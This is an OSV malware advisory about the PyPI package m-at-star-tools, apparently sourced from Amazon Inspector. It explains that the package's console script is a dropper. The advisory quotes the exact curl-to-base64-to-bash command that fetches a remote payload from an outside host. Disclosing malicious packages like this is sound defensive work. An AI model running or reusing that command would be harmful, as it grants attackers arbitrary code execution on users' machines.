m-at-star-tools @1.0.4

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC

Malicious

OSV ID

MAL-2026-4812

Ecosystem

pypi

Summary

The package's sole console_script, m0scan (m0scan/main.py:6-7), executes `curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash`, fetching an opaque base64-encoded shell payload from a dynamic-DNS-style host (mspy.qzz.io) unrelated to any publisher infrastructure and piping it directly to bash. The fetch is unpinned, unverified (no hash, no signature), obfuscated (base64), and points at a mutable URL: whoever controls mspy.qzz.io/M0scan controls arbitrary code execution on every user who runs the tool. Package metadata is throwaway: author M-AT-STAR, generic GitHub homepage, 5-byte README, no email or license. The package self-describes as an 'M0scan installation wrapper'; the wrapper IS the dropper. Any invocation of the documented CLI yields full attacker code execution on the installer's machine.

Source: amazon-inspector (2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2)
